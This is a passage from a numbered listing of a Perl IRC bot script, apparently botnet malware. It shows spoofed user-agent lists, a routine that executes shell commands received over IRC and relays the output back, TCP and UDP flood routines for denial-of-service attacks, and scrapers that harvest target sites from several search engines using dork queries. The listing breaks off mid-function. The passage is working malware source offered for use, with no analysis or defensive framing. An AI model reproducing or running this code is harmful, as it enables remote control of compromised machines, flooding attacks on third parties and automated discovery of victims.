  5880. $ua->agent("'Opera/8.51 (Windows NT 5.1; U; en)");
  5881. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
  5882. $ua->agent("'Opera/8.51 (Windows NT 5.1; U; en;VWP-online.de)");
  5883. $ua->agent("'sproose/0.1-alpha (sproose crawler; http://www.sproose.com/bot.html; crawler@sproose.com)");
  5884. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0");
  5885. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0,gzip(gfe) (via translate.google.com)");
  5886. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1");
  5887. $ua->agent("'BrowserEmulator/0.9 see http://dejavu.org");
  5888. $ua->agent("'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)");
  5889. $ua->agent("'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)");
  5890. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:0.9.4.1) Gecko/20020508");
  5891. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/125.2 (KHTML, like Gecko)");
  5892. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.4) Gecko/20030624");
  5893. $ua->agent("'iCCrawler (http://www.iccenter.net/bot.htm)");
  5894. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.6) Gecko/20050321 Firefox/1.0.2");
  5895. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon; .NET CLR 1.1.4322)");
  5896. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; de-AT; rv:1.7.12) Gecko/20051013 Debian/1.7.12-1ubuntu1");
  5897. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8) Gecko/20051111 Firefox/1.5");
  5898. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)");
  5899. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:0.9.4.1) Gecko/20020508 Netscape6/6.2.3");
  5900. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; de) Opera 8.50");
  5901. $ua->agent("'Mozilla/3.0 (x86 [de] Windows NT 5.0; Sun)");
  5902. $ua->agent("'Java/1.4.1_04");
  5903. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8) Gecko/20051111 Firefox/1.5");
  5904. $ua->agent("'msnbot/0.9 (+http://search.msn.com/msnbot.htm)");
  5905. $ua->agent("'NutchCVS/0.8-dev (Nutch running at UW; http://www.nutch.org/docs/en/bot.html; sycrawl@cs.washington.edu)");
  5906. $ua->agent("'Mozilla/4.0 compatible ZyBorg/1.0 (wn-14.zyborg@looksmart.net; http://www.WISEnutbot.com)");
  5907. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; de) Opera 8.53");
  5908. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.4) Gecko/20030619 Netscape/7.1 (ax)");
  5909. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/312.8 (KHTML, like Gecko) Safari/312.6");
  5910. $ua->agent("'Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt)");
  5911. $ua->agent("'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)");
  5912. $ua->agent("'Mozilla/4.0 (compatible; MSIE 5.16; Mac_PowerPC)");
  5913. $ua->agent("'Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)");
  5914. $ua->agent("'Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)");
  5915. $ua->agent("'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)");
  5916. $ua->agent("'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; .NET CLR 1.1.4322)");
  5917. $ua->agent("'Mozilla/4.0 (compatible; MSIE 5.0; Windows 95)");
  5918. $ua->agent("'Mozilla/4.0 (compatible; MSIE 5.5; AOL 7.0; Windows 98)");
  5919. $ua->agent("'Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)");
  5920. $ua->agent("'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
  5921. $ua->agent("'Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)");
  5922. $ua->agent("'Opera/8.53 (Windows NT 5.1; U; en)");
  5923. $ua->agent("'Opera/8.01 (Windows NT 5.0; U; de)");
  5924. $ua->agent("'Opera/8.54 (Windows NT 5.1; U; de)");
  5925. $ua->agent("'Opera/8.53 (Windows NT 5.0; U; en)");
  5926. $ua->agent("'Opera/8.01 (Windows NT 5.1; U; de)");
  5927. $ua->agent("'Opera/8.50 (Windows NT 5.1; U; de)");
  5928. $ua->agent("'Mozilla/4.0 (compatible- MSIE 6.0- Windows NT 5.1- SV1- .NET CLR 1.1.4322");
  5929. $ua->agent("'Mozilla/4.0(compatible; MSIE 5.0; Windows 98; DigExt)");
  5930. $ua->agent("'Mozilla/4.0 (compatible; Cerberian Drtrs Version-3.2-Build-0)");
  5931. $ua->agent("'Mozilla/4.0 (compatible; AvantGo 6.0; FreeBSD)");
  5932. $ua->agent("'Mozilla/4.5 [de] (Macintosh; I; PPC)");
  5933. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)");
  5934. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; .NET CLR 1.1.4322; MSN 9.0;MSN 9.1; MSNbMSNI; MSNmen-us; MSNcIA; MPLUS)");
  5935. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {59FC8AE0-2D88-C929-DA8D-B559D01826E7}; .NET CLR 1.1.4322)");
  5936. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; snprtz|S04741035500914#914|isdn; .NET CLR 1.1.4322)");
  5937. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EnergyPlugIn; dial)");
  5938. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; iebar; .NET CLR 1.1.4322)");
  5939. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461; sbcydsl 3.12; YComp 5.0.0.0; YPC 3.2.0; .NET CLR 1.1.4322; yplus 5.1.02b)");
  5940. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Arcor 5.004; .NET CLR 1.0.3705)");
  5941. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)");
  5942. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; YComp 5.0.0.0; SV1; .NET CLR 1.0.3705)");
  5943. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Ringo; .NET CLR 1.1.4322)");
  5944. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.1; .NET CLR 1.1.4322; yplus 4.1.00b)");
  5945. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; YPC 3.2.0)");
  5946. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; AOL 7.0; Windows NT 5.1; FunWebProducts)");
  5947. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; BUILDWARE 1.6; .NET CLR 1.1.4322)");
  5948. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; HbTools 4.7.5)");
  5949. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.2.0; (R1 1.5)");
  5950. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; it)");
  5951. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts; SV1)");
  5952. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Arcor 5.004; FunWebProducts; HbTools 4.7.5)");
  5953. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; en)");
  5954. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Tablet PC 1.7)");
  5955. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312469)");
  5956. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)");
  5957. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon; SV1; FDM)");
  5958. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC; de-DE; rv:1.0.2)");
  5959. $ua->agent("'Mozilla/5.0 (Windows; U; Win98; de-DE; rv:1.7.12)");
  5960. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1)");
  5961. $ua->agent("'Mozilla/5.0 (compatible; Konqueror/3.4; Linux 2.6.14-kanotix-9; X11)");
  5962. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.10)");
  5963. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.12)");
  5964. $ua->agent("'Mozilla/5.0 (Windows; U; Win98; de; rv:1.8.0.1)");
  5965. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.1)");
  5966. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; de; rv:1.8.0.1)");
  5967. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12)");
  5968. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.2)");
  5969. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.1)");
  5970. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.7)");
  5971. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.6)");
  5972. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; de; rv:1.8)");
  5973. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.8)");
  5974. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10)");
  5975. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.7.10)");
  5976. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.8.0.1)");
  5977. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us)");
  5978. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8)");
  5979. $ua->agent("'Mozilla/5.0 (Windows; U; Win 9x 4.90; de; rv:1.8.0.1)");
  5980. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.7.12)");
  5981. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr)");
  5982. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.8)");
  5983. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; fi; rv:1.8.0.1)");
  5984. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; de-AT; rv:1.4.1)");
  5985. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.1)");
  5986. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.0.1)");
  5987. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; fr-FR; rv:1.7.12)");
  5988. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.0; zh-TW; rv:1.8.0.1)");
  5989. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5)");
  5990. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-AT; rv:1.7.3)");
  5991. $ua->agent("'Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.7.12)");
  5992. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.7.12)");
  5993. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; sl; rv:1.8.0.1)");
  5994. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.0.1)");
  5995. $ua->agent("'Mozilla/5.0 (X11; Linux i686; rv:1.7.5)");
  5996. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.6)");
  5997. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.2)");
  5998. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.6)");
  5999. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.0.1)");
  6000. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.7.6)");
  6001. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8a3)");
  6002. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.10)");
  6003. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1)");
  6004. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-AT; rv:1.7.12)");
  6005. $ua->agent("'Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.7.5)");
  6006. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.0.1)");
  6007. $ua->agent("'Mozilla/5.0 (compatible; Konqueror/3; Linux)");
  6008. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.8)");
  6009. $ua->agent("'Mozilla/5.0 (compatible; Konqueror/3.2; Linux)");
  6010. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; tg)");
  6011. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.8b4)");
  6012. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  6013. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  6014. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  6015. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  6016. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  6017. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  6018. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  6019. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  6020. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)");
  6021. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  6022. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)");
  6023. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  6024.  
  6025. }
  6026.  
  6027. $ua->timeout(1);
  6028.  
  6029. my $response=$ua->request($req);
  6030.  
  6031. if ($response->is_success) {
  6032.  
  6033. $re=$response->content;
  6034.  
  6035. }
  6036.  
  6037. return $re;
  6038.  
  6039. }
  6040.  
  6041.  
  6042.  
  6043. sub addproc {
  6044.  
  6045.  
  6046.  
  6047. my $proc=$_[0];
  6048.  
  6049. my $dork=$_[1];
  6050.  
  6051.  
  6052.  
  6053. open(FILE,">>/var/tmp/pids");
  6054.  
  6055. print FILE $proc." [".$irc_servers{$IRC_cur_socket}{'nick'}."] $dork\n";
  6056.  
  6057. close(FILE);
  6058.  
  6059. }
  6060.  
  6061.  
  6062.  
  6063.  
  6064.  
  6065. sub delproc {
  6066.  
  6067.  
  6068.  
  6069. my $proc=$_[0];
  6070.  
  6071. open(FILE,"/var/tmp/pids");
  6072.  
  6073.  
  6074.  
  6075. while(<FILE>) {
  6076.  
  6077. $_ =~ /(\d+)\s+(.*)/;
  6078.  
  6079. $childs{$1}=$2;
  6080.  
  6081. }
  6082.  
  6083. close(FILE);
  6084.  
  6085. delete($childs{$proc});
  6086.  
  6087.  
  6088.  
  6089. open(FILE,">/var/tmp/pids");
  6090.  
  6091.  
  6092.  
  6093. for $klucz (keys %childs) {
  6094.  
  6095. print FILE $klucz." ".$childs{$klucz}."\n";
  6096.  
  6097. }
  6098.  
  6099. }
  6100.  
  6101.  
  6102.  
  6103. sub zr {
  6104.  
  6105. my $printl=$_[0];
  6106.  
  6107. my $comando=$_[1];
  6108.  
  6109. if ($comando =~ /cd (.*)/) {
  6110.  
  6111. chdir("$1") || msg("$printl", "No such file or directory");
  6112.  
  6113. return;
  6114.  
  6115. } elsif ($pid = fork) {
  6116.  
  6117. waitpid($pid, 0);
  6118.  
  6119. } else {
  6120.  
  6121. if (fork) {
  6122.  
  6123. exit;
  6124.  
  6125. } else {
  6126.  
  6127. my @resp=`$comando 2>&1 3>&1`;
  6128.  
  6129. my $c=0;
  6130.  
  6131. foreach my $linha (@resp) {
  6132.  
  6133. $c++;
  6134.  
  6135. chop $linha;
  6136.  
  6137. sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
  6138.  
  6139. if ($c == "$linas_max") {
  6140.  
  6141. $c=0;
  6142.  
  6143. sleep $sleep;
  6144.  
  6145. }
  6146.  
  6147. }
  6148.  
  6149. exit;
  6150.  
  6151. }
  6152.  
  6153. }
  6154.  
  6155. }
  6156.  
  6157.  
  6158.  
  6159. sub tcpflooder {
  6160.  
  6161. my $itime = time;
  6162.  
  6163. my ($cur_time);
  6164.  
  6165. my ($ia,$pa,$proto,$j,$l,$t);
  6166.  
  6167. $ia=inet_aton($_[0]);
  6168.  
  6169. $pa=sockaddr_in($_[1],$ia);
  6170.  
  6171. $ftime=$_[2];
  6172.  
  6173. $proto=getprotobyname('tcp');
  6174.  
  6175. $j=0;$l=0;
  6176.  
  6177. $cur_time = time - $itime;
  6178.  
  6179. while ($l<1000){
  6180.  
  6181. $cur_time = time - $itime;
  6182.  
  6183. last if $cur_time >= $ftime;
  6184.  
  6185. $t="SOCK$l";
  6186.  
  6187. socket($t,PF_INET,SOCK_STREAM,$proto);
  6188.  
  6189. connect($t,$pa)||$j--;
  6190.  
  6191. $j++;
  6192.  
  6193. $l++;
  6194.  
  6195. }
  6196.  
  6197. $l=0;
  6198.  
  6199. while ($l<1000){
  6200.  
  6201. $cur_time = time - $itime;
  6202.  
  6203. last if $cur_time >= $ftime;
  6204.  
  6205. $t="SOCK$l";
  6206.  
  6207. shutdown($t,2);
  6208.  
  6209. $l++;
  6210.  
  6211. }
  6212.  
  6213. }
  6214.  
  6215.  
  6216.  
  6217. sub udpflooder {
  6218.  
  6219. my $iaddr = inet_aton($_[0]);
  6220.  
  6221. my $msg = 'A' x $_[1];
  6222.  
  6223. my $ftime = $_[2];
  6224.  
  6225. my $cp = 0;
  6226.  
  6227. my (%pacotes);
  6228.  
  6229. $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
  6230.  
  6231. socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
  6232.  
  6233. socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
  6234.  
  6235. socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
  6236.  
  6237. socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
  6238.  
  6239. return(undef) if $cp == 4;
  6240.  
  6241. my $itime = time;
  6242.  
  6243. my ($cur_time);
  6244.  
  6245. while ( 1 ) {
  6246.  
  6247. for (my $porta = 1; $porta <= 65000; $porta++) {
  6248.  
  6249. $cur_time = time - $itime;
  6250.  
  6251. last if $cur_time >= $ftime;
  6252.  
  6253. send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
  6254.  
  6255. send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
  6256.  
  6257. send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
  6258.  
  6259. send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
  6260.  
  6261. for (my $pc = 3; $pc <= 255;$pc++) {
  6262.  
  6263. next if $pc == 6;
  6264.  
  6265. $cur_time = time - $itime;
  6266.  
  6267. last if $cur_time >= $ftime;
  6268.  
  6269. socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
  6270.  
  6271. send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
  6272.  
  6273. }
  6274.  
  6275. }
  6276.  
  6277. last if $cur_time >= $ftime;
  6278.  
  6279. }
  6280.  
  6281. return($cur_time, %pacotes);
  6282.  
  6283. }
  6284.  
  6285.  
  6286.  
  6287. sub ctcp {
  6288.  
  6289. return unless $#_ == 1;
  6290.  
  6291. sendraw("PRIVMSG $_[0] :\001$_[1]\001");
  6292.  
  6293. }
  6294.  
  6295.  
  6296.  
  6297. sub msg {
  6298.  
  6299. return unless $#_ == 1;
  6300.  
  6301. sendraw("PRIVMSG $_[0] :$_[1]");
  6302.  
  6303. }
  6304.  
  6305.  
  6306.  
  6307. sub notice {
  6308.  
  6309. return unless $#_ == 1;
  6310.  
  6311. sendraw("NOTICE $_[0] :$_[1]");
  6312.  
  6313. }
  6314.  
  6315.  
  6316.  
  6317. sub op {
  6318.  
  6319. return unless $#_ == 1;
  6320.  
  6321. sendraw("MODE $_[0] +o $_[1]");
  6322.  
  6323. }
  6324.  
  6325.  
  6326.  
  6327. sub deop {
  6328.  
  6329. return unless $#_ == 1;
  6330.  
  6331. sendraw("MODE $_[0] -o $_[1]");
  6332.  
  6333. }
  6334.  
  6335.  
  6336.  
  6337. sub j {
  6338.  
  6339. &join(@_);
  6340.  
  6341. }
  6342.  
  6343.  
  6344.  
  6345. sub join {
  6346.  
  6347. return unless $#_ == 0;
  6348.  
  6349. sendraw("JOIN $_[0]");
  6350.  
  6351. }
  6352.  
  6353.  
  6354.  
  6355. sub p {
  6356.  
  6357. part(@_);
  6358.  
  6359. }
  6360.  
  6361.  
  6362.  
  6363. sub part {
  6364.  
  6365. sendraw("PART $_[0]");
  6366.  
  6367. }
  6368.  
  6369.  
  6370.  
  6371. sub nick {
  6372.  
  6373. return unless $#_ == 0;
  6374.  
  6375. sendraw("NICK $_[0]");
  6376.  
  6377. }
  6378.  
  6379.  
  6380.  
  6381. sub quit {
  6382.  
  6383. sendraw("QUIT :$_[0]");
  6384.  
  6385. }
  6386.  
  6387.  
  6388.  
  6389. sub fetch(){
  6390.  
  6391. my $rnd=(int(rand(9999)));
  6392.  
  6393. my $n= 80;
  6394.  
  6395. if ($rnd<5000) {
  6396.  
  6397. $n<<=1;
  6398.  
  6399. }
  6400.  
  6401. my $s= (int(rand(10)) * $n);
  6402.  
  6403. my @dominios = ("removed-them-all");
  6404.  
  6405. my @str;
  6406.  
  6407. foreach $dom (@dominios){
  6408.  
  6409. push (@str,"@gstring");
  6410.  
  6411. }
  6412.  
  6413. my $query="www.google.com/search?q=";
  6414.  
  6415. $query.=$str[(rand(scalar(@str)))];
  6416.  
  6417. $query.="&num=$n&start=$s";
  6418.  
  6419. my @lst=();
  6420.  
  6421. sendraw("privmsg #debug :DEBUG only test googling: ".$query."");
  6422.  
  6423. my $page = http_query($query);
  6424.  
  6425. while ($page =~ m/<a href=\"?http:\/\/([^>\"]+)\"? class=l>/g){
  6426.  
  6427. if ($1 !~ m/google|cache|translate/){
  6428.  
  6429. push (@lst,$1);
  6430.  
  6431. }
  6432.  
  6433. }
  6434.  
  6435. return (@lst);
  6436.  
  6437.  
  6438.  
  6439. sub yahoo(){
  6440.  
  6441. my @lst;
  6442.  
  6443. my $key = $_[0];
  6444.  
  6445. for($b=1;$b<=1000;$b+=100){
  6446.  
  6447. my $Ya=("http://search.yahoo.com/search?ei=UTF-8&p=".key($key)."&n=100&fr=sfp&b=".$b);
  6448.  
  6449. my $Res=query($Ya);
  6450.  
  6451. while($Res =~ m/\<span class=yschurl>(.+?)\<\/span>/g){
  6452.  
  6453. my $k=$1;
  6454.  
  6455. $k=~s/<b>//g;
  6456.  
  6457. $k=~s/<\/b>//g;
  6458.  
  6459. $k=~s/<wbr>//g;
  6460.  
  6461. my @grep=links($k);
  6462.  
  6463. push(@lst,@grep);
  6464.  
  6465. }}
  6466.  
  6467. return @lst;
  6468.  
  6469. }
  6470.  
  6471.  
  6472.  
  6473. sub msn(){
  6474.  
  6475. my @lst;
  6476.  
  6477. my $key = $_[0];
  6478.  
  6479. for($b=1;$b<=1000;$b+=10){
  6480.  
  6481. my $msn=("http://search.msn.de/results.aspx?q=".key($key)."&first=".$b."&FORM=PORE");
  6482.  
  6483. my $Res=query($msn);
  6484.  
  6485. while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
  6486.  
  6487. if($1 !~ /msn|live/){
  6488.  
  6489. my $k=$1;
  6490.  
  6491. my @grep=links($k);
  6492.  
  6493. push(@lst,@grep);
  6494.  
  6495. }}}
  6496.  
  6497. return @lst;
  6498.  
  6499. }
  6500.  
  6501.  
  6502.  
  6503. sub lycos(){
  6504.  
  6505. my $inizio=0;
  6506.  
  6507. my $pagine=20;
  6508.  
  6509. my $key=$_[0];
  6510.  
  6511. my $av=0;
  6512.  
  6513. my @lst;
  6514.  
  6515. while($inizio <= $pagine){
  6516.  
  6517. my $lycos="http://search.lycos.com/?query=".key($key)."&page=$av";
  6518.  
  6519. my $Res=query($lycos);
  6520.  
  6521. while ($Res=~ m/<span class=\"?grnLnk small\"?>http:\/\/(.+?)\//g ){
  6522.  
  6523. my $k="$1";
  6524.  
  6525. my @grep=links($k);
  6526.  
  6527. push(@lst,@grep);
  6528.  
  6529. }
  6530.  
  6531. $inizio++;
  6532.  
  6533. $av++;
  6534.  
  6535. }
  6536.  
  6537. return @lst;
  6538.  
  6539. }
  6540.  
  6541.  
  6542.  
  6543. #####
  6544.  
  6545. sub aol(){
  6546.  
  6547. my @lst;
  6548.  
  6549. my $key = $_[0];
  6550.  
  6551. for($b=1;$b<=100;$b++){
  6552.  
  6553. my $AoL=("http://search.aol.com/aol/search?query=".key($key)."&page=".$b."&nt=null&ie=UTF-8");
  6554.  
  6555. my $Res=query($AoL);
  6556.  
  6557. while($Res =~ m/<p class=\"deleted\" property=\"f:url\">http:\/\/(.+?)\<\/p>/g){
  6558.  
  6559. my $k=$1;
  6560.  
  6561. my @grep=links($k);
  6562.  
  6563. push(@lst,@grep);
  6564.  
  6565. }}
  6566.  
  6567. return @lst;
  6568.  
  6569. }
  6570.  
  6571. #####
  6572.  
  6573.  
  6574.  
  6575. #####
  6576.  
  6577. sub alltheweb()
  6578.  
  6579. {
  6580.  
  6581. my @lst;
  6582.  
  6583. my $key=$_[0];
  6584.  
  6585. my $i=0;
  6586.  
  6587. my $pg=0;
  6588.  
  6589. for($i=0; $i<=1000; $i+=100)
  6590.  
  6591. {
  6592.  
  6593. my $all=("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$i);
  6594.  
  6595. my $Res=query($all);
  6596.  
  6597. while($Res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g){
  6598.  
  6599. my $k=$1;
  6600.  
  6601. $k=~s/ //g;
  6602.  
  6603. my @grep=links($k);
  6604.  
  6605. push(@lst,@grep);
  6606.  
  6607. }}
  6608.  
  6609. return @lst;
  6610.  
  6611. }
  6612.  
  6613.  
  6614.  
  6615. sub google(){
  6616.  
  6617. my @lst;
  6618.  
  6619. my $key = $_[0];
  6620.  
  6621. for($b=0;$b<=100;$b+=100){
  6622.  
  6623. my $Go=("http://www.google.it/search?hl=it&q=".key($key)."&num=100&filter=0&start=".$b);
  6624.  
  6625. my $Res=query($Go);
  6626.  
  6627. while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
